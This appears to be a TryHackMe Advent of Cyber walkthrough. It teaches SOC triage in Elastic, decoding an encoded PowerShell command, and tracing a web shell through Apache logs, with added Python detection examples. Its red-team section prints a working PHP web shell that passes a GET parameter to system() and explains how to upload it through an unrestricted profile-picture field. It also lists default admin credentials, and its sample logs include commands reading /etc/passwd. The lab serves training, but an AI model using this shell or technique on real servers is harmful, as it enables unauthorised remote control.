TRUE POSITIVES OR FALSE POSITIVES?
In a SOC, events from different devices are sent to the SIEM, which is the single source of truth where all the information and events are aggregated. Certain rules (Detection Engineering rules) are defined to identify malicious or suspicious activity from these events. If an event or set of events fulfils the conditions of a rule, it triggers an alert. A SOC analyst then analyses the alert to identify if the alert is a True Positive (TP) or a False Positive (FP). An alert is considered a TP if it contains actual malicious activity. On the flip side, if the alert triggers because of an activity that is not actually malicious, it is considered an FP. This might seem very simple in theory, but practically, separating TPs from FPs can be a tedious job. It can sometimes become very confusing to differentiate between an attacker and a system administrator. MAKING A DECISION While it is confusing to differentiate between TPs and FPs, it is very crucial to get it right. If a TP is falsely classified as an FP, it can lead to a significant impact from a missed cyber attack. If an FP is falsely classified as a TP, precious time will be spent focusing on the FP, which might lead to less focus on an actual attack. So, how exactly do we ensure that we perform this crucial job effectively? We can use the below pointers to guide us. Using the SOC Superpower The SOC has a superpower. When they are unsure whether an activity is performed by a malicious actor or a legitimate user, they can just confirm with the user. This privilege is not available to the attacker. A SOC analyst, on the other hand, can just send an email or call the relevant person to get confirmation of a certain activity. In mature organisations, any changes that might trigger an alert in the SOC often require Change Requests to be created and approved through the IT change management process. Depending on the process, the SOC team can ask the users to share Change Request details for confirmation. 
Surely, if it is a legitimate and approved activity, it must have an approved Change Request.

Context
While it might seem like the SOC superpower makes things easy, that is not always the case. Some situations act as Kryptonite to the SOC superpower:
* The organisation doesn't have a change request process in place.
* The performed activity was outside the scope of the change request, or differed from what was approved.
* The activity that triggered the alert is not something that goes through change management in the first place, such as copying files to a certain location, uploading a file to some website, or a failed login to a system.
* An insider performed an activity they are not authorised to perform, whether intentionally or unintentionally.
* A user performed a malicious activity because a threat actor social-engineered them into it; asked about it, they will confirm the activity as their own.
In such scenarios, the SOC analyst has to understand the context of the activity and make a judgement call based on their analysis skills and security knowledge. The analyst can look at the past behaviour of the user, or at the prevalence of a certain event or artefact across the organisation or a department. For example, if a user from the network team is using Wireshark, there is a good chance other users from the same team also use Wireshark. Wireshark on a machine belonging to someone from HR or finance, however, should rightfully raise some eyebrows.

Correlation
When building context, the analyst must correlate different events into a story or timeline. Correlation means using the events before and after the alert to recreate that timeline. While correlating, it is important to note the artefacts that can be used to connect the dots: IP addresses, machine names, user names, hashes, file paths, and so on. Correlation requires forming hypotheses and checking that the evidence supports them.
A hypothesis can be something like: the user downloaded malware from a spoofed domain. The evidence to support it would be proxy logs showing that a website was visited, that the website used a spoofed domain name, and that a certain file was downloaded from it. Now, say we want to identify whether the malware executed through a vulnerability in an application or because a user intentionally executed it. For that, we would look at the parent process of the malware and the command-line parameters used to execute it. If the parent process is Windows Explorer, we can assume the user executed the malware (possibly because they were tricked into it via social engineering); if the parent process is a web browser or a word processor, the likelier explanation is that the malware was executed through a vulnerability in that application. This is a heuristic rather than a rule: a browser is also the parent when a user opens a file straight from its download bar, so the command line and the document that was open at the time should be checked before settling on either story.

IS THIS A TP OR AN FP?
Like every SOC, the analysts in the Wareville SOC need to differentiate TPs from FPs. This becomes especially difficult near Christmas, when the analysts suffer from alert fatigue, and the chance of misclassifying TPs as FPs and vice versa is high. The analysts therefore appreciate any help they can get at this crucial time. To make matters worse, the office of the Mayor has sent the analysts an alert about multiple encoded PowerShell commands run on their systems. Perhaps we can help with that.

Connection Details
To help the analysts, start the Elastic SIEM in the attached VM by clicking the Start Machine button below. The instance takes about 5 minutes to initialise and for the Elastic login page to appear.
Once the machine is up and running, connect to the Elastic SIEM by visiting https://LAB_WEB_URL.p.thmlabs.com in your browser with the following credentials:
URL https://LAB_WEB_URL.p.thmlabs.com
Username elastic
Password elastic
Once logged in, click the menu in the top-left corner and go to the Discover tab to see the events. According to the alert sent by the Mayor's office, the activity occurred on Dec 1st, 2024, between 0900 and 0930. Set this as the time window by clicking the timeframe settings in the upper-right corner. Note that we need to click the Absolute tab and set the exact timeframe we want to view. Lastly, click the Update button to apply the changes. After updating the settings, we see 21 events in that timeframe. In their raw form these events are not very readable. We can use the fields in the left pane to add columns to the results: hovering over a field name in the left pane shows a toggle that adds that field as a column. Since we are looking for events related to PowerShell, we want the following details from the logs:
* The hostname where the command was run: add host.hostname as a column.
* The user who performed the activity: add user.name.
* The event category, to make sure we are looking at the right kind of event: add event.category.
* The actual commands run through PowerShell: add process.command_line.
* Whether the activity succeeded: add event.outcome.
With these columns added, the results become readable. Interesting! It looks like someone ran the same encoded PowerShell command on multiple machines. Another thing to note is that before each execution of the PowerShell command we see an authentication event, which was successful.
This activity is observed individually on each machine, and the time difference between the login and the PowerShell command looks very precise. Best practice dictates that named accounts are used for any kind of administrator activity so that there is accountability and attribution for each administrative action. The use of a generic admin account here is suspicious in itself. On asking, the analysts told us that this account is shared by two administrators, neither of whom was in the office when this activity occurred. Hmmm, something is definitely not right. Are these some of Glitch's shenanigans? Is Christmas in danger? We need to find out who ran these commands. Let's add the source.ip field as a column to find out where the PowerShell commands were run from. Since the source.ip field is only populated for the authentication events, we can filter the process events out to see if there is a pattern. To do that, hover over the event.category field in one of the authentication events. Two options appear: filter for this value (+ sign) or filter the value out (- sign). Filter for authentication events by clicking the plus (+) sign, so that only those are shown in the results. The output now only contains the authentication events. Since this view does not give useful insights, remove the filter for now by clicking the x beside it. The timeframe we used was chosen for the PowerShell events, and the authentication events might have started before that, so we need to widen the search to understand the context and the historical events for this user. Let's see if we have any events from the user between the 29th of November and the 1st of December by updating the time filter to cover those days. Note: remember to remove the event.category filter before this step.
Woah, there have been more than 6800 events in these three days, and we see a spike at the end of the logs. However, even though the time filter runs to the end of the 1st of December, there are no events after the successful PowerShell execution. There were also many more authentication events on the previous days than on the 1st of December. To understand the events further, let's filter for user.name: service_admin and source.ip: 10.0.11.11 to narrow the search. Uh-oh! All of these events have been coming from the same user and the same IP address. We definitely need to investigate further. This also does not explain the spike. Let's filter for authentication events first by clicking the plus (+) button beside the event.category value. Then, to find the IP address that caused the spike, filter the source IP 10.0.11.11 out by clicking the minus (-) button beside it. Scrolling down through the results, we see many events for failed logins. We also see that the IP address behind the spike (ending in .255.1) differs from the one seen in the events continuously coming in on the previous days (10.0.11.11). The analysts had previously investigated the failed logins and found that a script with expired credentials was causing them; that script was updated with a fresh set of credentials. This might just be another script. Let's find out. Remove the source IP filter so we can focus on the authentication events close to the spike. With the new filter, we see that the failed logins stopped a little while after the successful login from the new IP. Our suspicions are rising. It seems that someone brute-forced the account on December 1st.
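The brute-force-then-execute pattern just traced through Kibana, together with the decoding of the -EncodedCommand value that McSkidy performs later in this task, as an added Python example that is not part of the room. The events are constructed in the shape of the Elastic fields used above; the hostnames, the shared account name, the timestamps and the 198.51.100.7 source address are assumptions for the example and not the lab's data. The only real value is the encoded command quoted in the task.

```python
"""Added example, not part of the TryHackMe room: the triage the task performs by
clicking through Kibana, written as plain Python over constructed events that use the
same Elastic field names (host.hostname, user.name, event.category, event.outcome,
source.ip, process.command_line)."""
import base64
import re
from collections import Counter
from datetime import datetime, timedelta


def ev(ts, category, host, user, outcome=None, src=None, cmd=None):
    """Build one flat event, shaped like a row in the Discover table."""
    return {"@timestamp": datetime.fromisoformat(ts), "event.category": category,
            "host.hostname": host, "user.name": user, "event.outcome": outcome,
            "source.ip": src, "process.command_line": cmd}


# The encoded command is the one quoted in the task. Hosts, account, IPs and timestamps
# are constructed for this example; 198.51.100.7 is a documentation address standing in
# for the brute-forcing source and is not the lab's answer.
ENCODED = ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -EncodedCommand "
           "SQBuAHMAdABhAGwAbAAtAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUAIAAtAEEAYwBjAGUAcAB0AEEAbABsACAALQBBAHUAdABvAFIAZQBiAG8AbwB0AA==")
EVENTS = [
    # the noisy script with expired credentials seen on the days before
    ev("2024-11-30T08:00:00", "authentication", "ADM-01", "service_admin", "failure", "10.0.11.11"),
    ev("2024-11-30T20:00:00", "authentication", "ADM-01", "service_admin", "failure", "10.0.11.11"),
    # a burst of failures from a new source, then a success and an encoded command
    *[ev(f"2024-12-01T08:58:0{i}", "authentication", "ADM-01", "service_admin", "failure", "198.51.100.7")
      for i in range(5)],
    ev("2024-12-01T08:59:59", "authentication", "ADM-01", "service_admin", "success", "198.51.100.7"),
    ev("2024-12-01T09:00:01", "process", "ADM-01", "service_admin", "success", cmd=ENCODED),
    ev("2024-12-01T09:05:00", "authentication", "ADM-02", "service_admin", "success", "198.51.100.7"),
    ev("2024-12-01T09:05:02", "process", "ADM-02", "service_admin", "success", cmd=ENCODED),
    # an unrelated process with no login in the window: nothing to attribute it to
    ev("2024-12-01T09:15:00", "process", "FIN-01", "alice", "success", cmd="notepad.exe budget.xlsx"),
]


def failed_logins(events):
    """Failed authentication count per (account, source IP): the first pivot when a
    spike of failures shows up in the timeline."""
    return Counter((e["user.name"], e["source.ip"]) for e in events
                   if e["event.category"] == "authentication" and e["event.outcome"] == "failure")


def brute_force_successes(events, threshold=5, window=timedelta(minutes=10)):
    """Successful logins preceded by at least `threshold` failures for the same account
    from the same source within `window`: the brute-force-then-success pattern."""
    hits = []
    for e in events:
        if e["event.category"] != "authentication" or e["event.outcome"] != "success":
            continue
        prior = [f for f in events
                 if f["event.category"] == "authentication" and f["event.outcome"] == "failure"
                 and f["source.ip"] == e["source.ip"] and f["user.name"] == e["user.name"]
                 and e["@timestamp"] - window <= f["@timestamp"] < e["@timestamp"]]
        if len(prior) >= threshold:
            hits.append({"host": e["host.hostname"], "source.ip": e["source.ip"],
                         "when": e["@timestamp"], "failures_before": len(prior)})
    return hits


ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(command_line):
    """powershell -EncodedCommand carries Base64 of the script as UTF-16LE text, which is
    why CyberChef needs From Base64 followed by Decode text set to UTF-16LE (1200).
    Lines without the flag are returned unchanged."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return command_line
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def correlate_process_with_login(events, window=timedelta(seconds=30)):
    """Attribute each process event to the latest successful login on the same host for
    the same account within `window`; that login's source.ip says who ran it."""
    logins = [e for e in events
              if e["event.category"] == "authentication" and e["event.outcome"] == "success"]
    out = []
    for p in (e for e in events if e["event.category"] == "process"):
        candidates = [l for l in logins
                      if l["host.hostname"] == p["host.hostname"] and l["user.name"] == p["user.name"]
                      and timedelta(0) <= p["@timestamp"] - l["@timestamp"] <= window]
        login = max(candidates, key=lambda l: l["@timestamp"], default=None)
        out.append({"host": p["host.hostname"], "user": p["user.name"],
                    "command": decode_encoded_command(p["process.command_line"]),
                    "source.ip": login["source.ip"] if login else None})
    return out


def triage(events):
    """The escalation decision the task reaches: commands attributed to a login that
    followed a brute force are escalated as a true positive before anyone has read the
    command. Whether the command itself was harmful is the next question."""
    attacker_ips = {h["source.ip"] for h in brute_force_successes(events)}
    runs = [c for c in correlate_process_with_login(events) if c["source.ip"] in attacker_ips]
    return {"escalate": bool(runs), "attacker_ips": sorted(attacker_ips),
            "hosts": sorted(r["host"] for r in runs),
            "commands": sorted({r["command"] for r in runs})}


if __name__ == "__main__":
    print(failed_logins(EVENTS))
    print(triage(EVENTS))
```

The two window sizes (ten minutes for the failure burst, thirty seconds for login-to-process attribution) are tuning knobs for the environment; in Kibana the same attribution is done by eye from the sorted timeline, which is exactly the step that suffers under alert fatigue.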
The results also show that they succeeded, because a successful authentication attempt follows the failures and is quickly followed by PowerShell commands on the affected machines. Once the PowerShell commands were run, there were no further login attempts. This looks like a TP, and it needs to be escalated so that McSkidy can help us respond to this incident.

CHRISTMAS IN DANGER?
The alarms have gone off, and McSkidy has been called in to take this incident further. The analysts briefed McSkidy about the incident. McSkidy observed that nobody had actually looked at what the PowerShell command contained. Since the command is encoded, it needs to be decoded. McSkidy changed the filter to event.category: process to take a closer look at the PowerShell commands. The command is visible in the process.command_line field:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand SQBuAHMAdABhAGwAbAAtAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUAIAAtAEEAYwBjAGUAcAB0AEEAbABsACAALQBBAHUAdABvAFIAZQBiAG8AbwB0AA==
McSkidy knows that the -EncodedCommand parameter takes a Base64 string, and that it can be decoded with tools such as CyberChef. Since the command might contain sensitive information and therefore must not be submitted to a public portal, McSkidy spins up her own instance of CyberChef hosted locally. McSkidy started by pasting the encoded part of the command into the Input pane. She then used two operations from the left pane, From Base64 followed by Decode text. Note that she configured Decode text to UTF-16LE (1200), because PowerShell expects the script to be UTF-16LE encoded before it is Base64 encoded; decoding it as UTF-8 instead would leave a null byte after every character. The result provided a sigh of relief to McSkidy, who had feared that Christmas had been ruined. Someone had come in to help McSkidy and the team secure their defences, but who?

VILLAIN OR HERO?
McSkidy further analysed the secret hero and came to a startling revelation.
The credentials used by the script on the machines that ran the Windows updates were outdated. Someone brute-forced the systems and fixed the credentials after successfully logging in. This was evident from the fact that each executed PowerShell command was preceded by a successful login from the same source IP, the one behind the failed logins. And what's even more startling? Once McSkidy confirmed who owned that IP address, it turned out to be Glitch who accessed ADM-01 and fixed the credentials. This meant that the people of Wareville had misunderstood Glitch, who was just trying to help shore up the defences. But if Glitch was the one helping the defences, who was trying to sabotage them? Was it the Mayor who informed the SOC about these 'suspicious' PowerShell commands? Just as alerts aren't always what they seem in a SOC, so it was with the people of Wareville. As hard as it was to differentiate between a TP and an FP, so it was with the Mayor and Glitch. However, McSkidy can perhaps use the evidence-based deduction skills learned in a SOC to make this difference easier for the people of Wareville.

Answer the questions below
* What is the name of the account causing all the failed login attempts?
* How many failed logon attempts were observed?
* What is the IP address of Glitch?
* When did Glitch successfully logon to ADM-01? Format: MMM D, YYYY HH:MM:SS.SSS
* What is the decoded command executed by Glitch to fix the systems of Wareville?
* If you enjoyed this task, feel free to check out the Investigating with ELK 101 room.

Task 9 Log analysis
Day 3: Even if I wanted to go, their vulnerabilities wouldn't allow it.
Task includes a deployable machine

The Story
Today's AoC challenge follows a rather unfortunate series of events for the Glitch.
Here is a little passage which sets the scene for today's task:

Late one Christmas evening the Glitch had a feeling,
Something forgotten as he stared at the ceiling.
He got up out of bed and decided to check,
A note on his wall: "Two days! InsnowSec".
With a click and a type he got his hotel and tickets,
And sank off to sleep to the sound of some crickets.
Luggage in hand, he had arrived at Frosty Pines,
"To get to the conference, just follow the signs".
Just as he was ready the Glitch got a fright,
An RCE vulnerability on their website?!?
He exploited it quick and made a report,
But before he could send arrived his transport.
In the Frosty Pines SOC they saw an alert,
This looked quite bad, they called an expert.
The request came from a room, but they couldn't tell which,
The logs saved the day, it was the room of... the Glitch.

In this task, we will cover how the SOC team and their expert were able to find out what had happened (Operation Blue) and how the Glitch was able to gain access to the website in the first place (Operation Red). Let's get started, shall we?

LEARNING OBJECTIVES
* Learn about log analysis and tools like ELK.
* Learn about KQL and how it can be used to investigate logs using ELK.
* Learn about RCE (Remote Code Execution) and how it can be achieved via an insecure file upload.

CONNECTING TO THE MACHINE
Click on the green Start Machine button below to start the virtual machine for the practical. The practical VM may take 5 minutes to become accessible. You will also need to start the AttackBox by pressing the Start AttackBox button at the top of the room. Alternatively, you can connect your own hacking machine using the TryHackMe VPN.

OPERATION BLUE
In this section of the lesson, we will look at the tools and knowledge required for the blue segment, that is, the investigation of the attack itself using tools that enable us to analyse the logs.
For the first part of Operation Blue, we will demonstrate how to use ELK to analyse the logs of a demonstration web app, WareVille Rails. Feel free to follow along for practice.

LOG ANALYSIS & INTRODUCING ELK
Log analysis is crucial to blue-team work, as you have likely discovered through this year's Advent of Cyber. Analysing logs can quickly become overwhelming, especially with multiple devices and services. ELK, short for Elasticsearch, Logstash, and Kibana, combines storage, processing and visualisation tools to make analysing logs much more manageable. ELK forms a dedicated stack that can aggregate logs from multiple sources into one central place. Explaining how ELK collates and processes these logs is out of scope for today's task; if you wish to learn more, check out the Investigating with ELK 101 room. For now, it's enough to know that several processes behind the scenes achieve this. The first part of today's task is to investigate the attack on Frosty Pines Resort's Hotel Management System to see what it looks like to a blue teamer. You will then test your web app skills by recreating the attack.

USING ELK
Upon loading the URL http://MACHINE_IP:5601/ in your AttackBox's browser, you will be greeted with the ELK home page. For today's task, we will use Kibana's Discover interface to review Apache2 logs. To access it, click on the three lines at the top left of the page to open the slide-out tray, then, under the Analytics heading, click on Discover. We then need to select the collection that is relevant to us. A collection is a group of logs. For this stage of Operation Blue, we will review the logs in the "wareville-rails" collection; select it from the dropdown on the left of the display. Once you have done this, you will see a screen saying "No results match your search criteria". This is because no logs have been ingested within the last 15 minutes, which is the default time range.
Do not panic; the time range is easy to change. Click the text on the right side of the box with the calendar icon, select "Absolute" from the dropdown, and choose the start date and time. Next, click the text on the right side of the arrow and repeat the process for the end date and time. For the WareVille Rails collection, set the start time to October 1 2024 00:00:00 and the end time to October 1 2024 23:30:00. Please note that the day and time in this WareVille Rails demonstration differ from the times required to review the FrostyPines Resorts collection in the second half of the practical. Now that we can see some entries, let's go over the basics of the Kibana Discover UI:
1. Search Bar: where we enter search queries written in KQL.
2. Index Pattern: a collection of logs. This can be from a specific host or from multiple hosts with a similar purpose (such as several web servers). In this case, the index pattern covers all logs relating to "wareville-rails".
3. Fields: this pane shows the fields that Elasticsearch has parsed from the logs, for example timestamp, response type and IP address.
4. Timeline: a visualisation of the event count over time.
5. Documents (Logs): the individual entries from the log file.
6. Time Filter: narrows the view to a specific time frame (absolute) or to a relative range such as "Last 7 days".

KIBANA QUERY LANGUAGE (KQL)
KQL, or Kibana Query Language, is an easy-to-use language for searching documents for values, for example to check whether a field exists or matches a value. If you are familiar with Splunk, think of SPL (Search Processing Language). For example, the query to search all documents for an IP address may look like ip.address: "10.10.10.10".
Alternatively, Kibana also supports Lucene query syntax, a more advanced language with features such as fuzzy terms (matching terms similar to the one provided), regular expressions, and so on. For today's task, we will stick with KQL, which is enabled by default. The mini cheat sheet below covers the KQL syntax you may find helpful in today's task.
* " " (quotation marks): search for a specific value within the documents; values in quotation marks are matched exactly. Example: "TryHackMe"
* * (asterisk): a wildcard, which matches documents containing values similar to the one provided. Example: United* (would return United Kingdom and United States)
* OR: logical operator showing documents that contain either of the values provided. Example: "United Kingdom" OR "England"
* AND: logical operator showing documents that contain both values. Example: "Ben" AND "25"
* : (colon): search the specified field of a document for a value, such as an IP address. The fields you can use depend on the fields available in the index pattern. Example: ip.address: 10.10.10.10

INVESTIGATING A WEB ATTACK WITH ELK
Scenario: Thanks to our extensive intrusion detection capabilities, our systems alerted the SOC team to a web shell being uploaded to the WareVille Rails booking platform on Oct 1, 2024. Our task is to review the web server logs to determine how the attacker achieved this. If you would like to follow along, ensure that you have the "wareville-rails" collection selected. To investigate this scenario, change the time filter to show events for the day of the attack, setting the start to "Oct 1, 2024 @ 00:00:00.000" and the end to "Oct 2, 2024 @ 00:00:00.000". The logs now populate the display. Please note that the number of entries (hits) shown in this task may differ from the number on the practical VM.
An incredibly useful feature of ELK is that we can filter out noise. A web server (especially a popular one) will have a large number of log entries from ordinary user traffic, completely unrelated to the attack. Using the fields pane on the left, we can click the "+" and "-" icons next to a value to show only that value or to remove it from the display, respectively. Fun fact: clicking these filters simply applies the equivalent KQL syntax. In the demonstration, filtering the logs down to only those containing the IP address 10.13.27.115 reduces the count from 1,028 to 423 hits. We can combine filters on several fields, in or out, to drill down into the logs. To remove an applied filter, click the "x" on the filter pill just below the search bar. In this investigation, let's look at the activity of the IP address 10.9.98.230. Clicking on the "clientip" field shows its top values, i.e. the IPs with the most entries. Using the timeline at the top, we can see that a lot of activity from this IP address took place between 11:30:00 and 11:35:00, which is a good place to begin our analysis. Each log can be expanded using the ">" icon on the left of the document. Fortunately, the logs are pretty small in this instance, so we can browse through them looking for anything untoward. After some digging, a few entries stand out. Looking at the request field, a file named "shell.php" has been accessed with parameters "c" and "d" containing commands. These are likely to be commands entered into some form of web shell. Now that we have an initial lead, let's use a search query to find all logs that contain "shell.php". In the search bar at the top, the query message: "shell.php" returns every entry whose message field contains "shell.php".

OPERATION RED
In this section, we look at the red aspect: the attack itself and how it was carried out.
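The same hunt as above, done in Python instead of Kibana clicks, as an added example that is not part of the room: parse Apache combined-format access log lines, pick out requests to a server-side script sitting in an image upload directory with a command parameter, and report who used it and what they ran. The log lines are constructed for the example; the two client addresses are the ones the task mentions for the WareVille Rails demo, while the paths (/media/avatars/, /account/avatar.php), timestamps, referrer host and commands are assumptions and not the lab's data.

```python
"""Added example, not part of the TryHackMe room: the web shell hunt the task performs
with Kibana filters and the query message: "shell.php", done in Python over constructed
Apache combined-format log lines."""
import re
from collections import Counter
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed log lines. The client IPs are the ones the task mentions for the WareVille
# Rails demo; paths, timestamps, referrer host and commands are invented for the example.
LOG_LINES = """\
10.9.98.230 - - [01/Oct/2024:11:31:02 +0000] "GET /login.php HTTP/1.1" 200 1543 "-" "Mozilla/5.0"
10.9.98.230 - - [01/Oct/2024:11:31:40 +0000] "POST /account/avatar.php HTTP/1.1" 302 0 "http://example.thm/account" "Mozilla/5.0"
10.9.98.230 - - [01/Oct/2024:11:32:05 +0000] "GET /media/avatars/shell.php?cmd=id HTTP/1.1" 200 87 "-" "Mozilla/5.0"
10.13.27.115 - - [01/Oct/2024:11:32:30 +0000] "GET /timetable.php HTTP/1.1" 200 6120 "-" "Mozilla/5.0"
10.9.98.230 - - [01/Oct/2024:11:33:11 +0000] "GET /media/avatars/shell.php?cmd=cat%20%2Fetc%2Fpasswd HTTP/1.1" 200 2418 "-" "Mozilla/5.0"
10.9.98.230 - - [01/Oct/2024:11:34:48 +0000] "GET /media/avatars/shell.php?cmd=ls%20-la%20%2Fvar%2Fwww HTTP/1.1" 200 640 "-" "curl/8.4.0"
10.13.27.115 - - [01/Oct/2024:11:35:00 +0000] "GET /media/avatars/alice.png HTTP/1.1" 200 9071 "-" "Mozilla/5.0"
"""

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'(?P<clientip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"')


def parse_line(line):
    """One combined-format line to a dict; the query string is split into a dict so
    command parameters can be inspected directly. Unparseable lines give None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    url = urlsplit(entry["target"])
    entry["path"] = url.path
    entry["query"] = {k: v[0] for k, v in parse_qs(url.query).items()}   # %xx decoded here
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    return entry


def parse_log(text):
    return [e for e in map(parse_line, text.splitlines()) if e]


UPLOAD_DIRS = ("/media/avatars/",)            # assumed: where the app stores uploaded images
EXEC_PARAMS = ("cmd", "command", "c", "d")    # parameter names web shells commonly use


def find_webshell(entries, upload_dirs=UPLOAD_DIRS, exec_params=EXEC_PARAMS):
    """A server-side script inside an image upload directory, called with a command
    parameter, is the web shell signature. Returns where it is, who called it and what
    they ran, plus the KQL that would show the same entries in Discover; None if no match."""
    hits = [e for e in entries
            if e["path"].endswith(".php")
            and any(e["path"].startswith(d) for d in upload_dirs)
            and any(p in e["query"] for p in exec_params)]
    if not hits:
        return None
    first = min(hits, key=lambda e: e["ts"])
    return {"shell_path": first["path"], "first_seen": first["ts"],
            "clients": Counter(e["clientip"] for e in hits),
            "commands": [next(e["query"][p] for p in exec_params if p in e["query"]) for e in hits],
            "kql": 'message: "%s"' % first["path"].rsplit("/", 1)[-1]}


def likely_upload_requests(entries, report):
    """The attacker's POSTs before the shell was first called are where the upload
    itself happened; the task finds this by reading that client's requests in order."""
    attacker = report["clients"].most_common(1)[0][0]
    return [e["path"] for e in entries
            if e["clientip"] == attacker and e["method"] == "POST" and e["ts"] < report["first_seen"]]


if __name__ == "__main__":
    entries = parse_log(LOG_LINES)
    report = find_webshell(entries)
    print(report)
    print(likely_upload_requests(entries, report))
```

Two points worth keeping from this: the command parameters only become readable after URL-decoding (Kibana shows the raw %2F-encoded request unless a field has been parsed out for it), and the upload request itself usually looks benign on its own, a POST with a 302, so it is found by working backwards from the first call to the shell rather than by searching for it directly.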
WHY DO WEBSITES ALLOW FILE UPLOADS
File uploads are everywhere on websites, and for good reason. Users often need to upload files like profile pictures, invoices, or other documents to update their accounts, send receipts, or submit claims. These features make the user experience smoother and more efficient. But while this is convenient, it also creates a risk if file uploads aren't handled properly. If not properly secured, this feature can open up various vulnerabilities that attackers can exploit.

FILE UPLOAD VULNERABILITIES
File upload vulnerabilities occur when a website doesn't properly handle the files that users upload. If the site doesn't check what kind of file is being uploaded, how big it is, or what it contains, it opens the door to all sorts of attacks. For example:
* RCE: uploading a script that the server runs gives the attacker control over it.
* XSS: uploading an HTML file containing script that steals a cookie and sends it to the attacker's server when another user opens the file.
These can happen if a site doesn't properly secure its file upload functionality.

WHY UNRESTRICTED FILE UPLOADS ARE DANGEROUS
Unrestricted file uploads are particularly dangerous because they allow an attacker to upload any type of file. If the file's contents aren't validated to ensure only specific formats like PNG or JPG are accepted, an attacker could upload a malicious script, such as a PHP file or an executable, that the server might process and run. This can lead to code execution on the server, allowing attackers to take over the system. Examples of abuse through unrestricted file uploads include:
* Uploading a script that the server executes, leading to RCE.
* Uploading a crafted image file that triggers a vulnerability when processed by the server.
* Uploading a web shell and browsing to it directly in a browser.

USAGE OF WEAK CREDENTIALS
One of the easiest ways for attackers to break into systems is through weak or default credentials.
This can be an open door for attackers to gain unauthorised access. Default credentials are often found in systems where administrators failed to change the initial login details provided during setup. For attackers, trying a few common usernames and passwords can lead to easy access. Below are some examples of weak/default credentials that attackers might try:
Username / Password
admin / admin
administrator / administrator
admin@domainname / admin
guest / guest
Attackers can use tools or try these common credentials manually, which is often all it takes to break into the system.

WHAT IS REMOTE CODE EXECUTION (RCE)
Remote code execution (RCE) happens when an attacker finds a way to run their own code on a system. This is a highly dangerous vulnerability because it can allow the attacker to take control of the system, exfiltrate sensitive data, or compromise other connected systems.

WHAT IS A WEB SHELL
A web shell is a script that attackers upload to a vulnerable server, giving them remote control over it. Once a web shell is in place, attackers can run commands, manipulate files, and essentially use the compromised server as their own. They can even use it to launch attacks on other systems. For example, attackers could use a web shell to:
* Execute commands on the server
* Move laterally within the network
* Download sensitive data or pivot to other services
A web shell typically gives the attacker a web-based interface to run commands. In some cases, attackers instead use a reverse shell to establish a direct connection back to their own system, allowing them to control the compromised machine interactively. Once an attacker has this level of access, they might attempt privilege escalation to gain even more control, such as achieving root access or moving deeper into the network. Now that we're familiar with a remote code execution vulnerability and how it works, let's take a look at how we would exploit it!
PRACTICE MAKES PERFECT
To understand how a file upload vulnerability can result in RCE, the best approach is hands-on experience. A handy (and ethical) way to get it is to find and download a reputable open-source web application which has this vulnerability built into it. Many such projects exist in places like GitHub and can be run in your own environment to experiment and practice. In today's task, we will demonstrate achieving RCE via unrestricted file upload in an open-source railway management system that has this vulnerability built into it.

EXPLOITING RCE VIA FILE UPLOAD
Now we're going to go through how this vulnerability can be exploited. For now, you can just read along; an opportunity to put this knowledge into practice is coming up. Once an RCE vulnerability that can be exploited via file upload has been identified, we need to create a malicious file that allows remote code execution when uploaded. Below is an example PHP file which could be uploaded to exploit this vulnerability. Using your favourite text editor, copy and paste the code below and save it as shell.php.

<html>
<body>
<!-- the form submits back to this same file, passing the command as a GET parameter -->
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
// run whatever was submitted through the server's shell; "2>&1" folds stderr into
// the output so error messages are displayed as well
if (isset($_GET['command'])) {
    system($_GET['command'] . ' 2>&1');
}
?>
</pre>
</body>
</html>

When accessed, the script displays an input field. Whatever is entered into it is run against the underlying operating system using PHP's system() function, and the output is displayed to the user. This is the perfect file to upload to the vulnerable rail reservation application. The vulnerability surrounds the upload of a new profile image.
So, to exploit it, we navigate to the profile picture page. Instead of a new profile picture, we upload our malicious PHP script and update our profile. In the case of this application, the RCE is possible through unrestricted file upload. Once this "profile picture" is uploaded and the profile updated, the file is stored in the /admin/assets/img/profile/ directory. It can then be accessed directly via http://<ip-address-or-localhost>/<projectname>/admin/assets/img/profile/shell.php. When this URL is opened, the malicious code runs: we get the input bar, can run commands directly against the operating system through it, and the output is displayed. For example, running the command pwd returns the current working directory, which tells us where on the file system the application lives.

MAKING THE MOST OF IT
Once the vulnerability has been exploited and you have access to the operating system via a web shell, there are many next steps you could take, depending on a) what your goal is and b) what misconfigurations are present on the system, which determine exactly what you can do.
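The checks that make the profile-picture trick above fail, as an added example that is not the railway application's code. The real application is PHP; the logic is shown in Python with constructed byte strings standing in for uploaded files, and the size limit, the allowed types and the upload directory name are assumptions for the example.

```python
"""Added example, not the railway app's code: the validation an upload handler needs so
that renaming shell.php to a picture no longer gets it executed. Constructed uploads
stand in for real requests."""
import os
import secrets

# Allowed image types: MIME type -> (magic bytes the file must start with, stored extension)
ALLOWED_TYPES = {
    "image/png": (b"\x89PNG\r\n\x1a\n", ".png"),
    "image/jpeg": (b"\xff\xd8\xff", ".jpg"),
}
MAX_BYTES = 2 * 1024 * 1024                       # assumed limit for a profile picture
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")   # heuristic, see validate_image


class UploadRejected(ValueError):
    pass


def validate_image(data, claimed_name, content_type):
    """Return the server-chosen file name for an acceptable image, or raise UploadRejected.
    Decisions rest on the bytes themselves; the client-supplied name and MIME type are only
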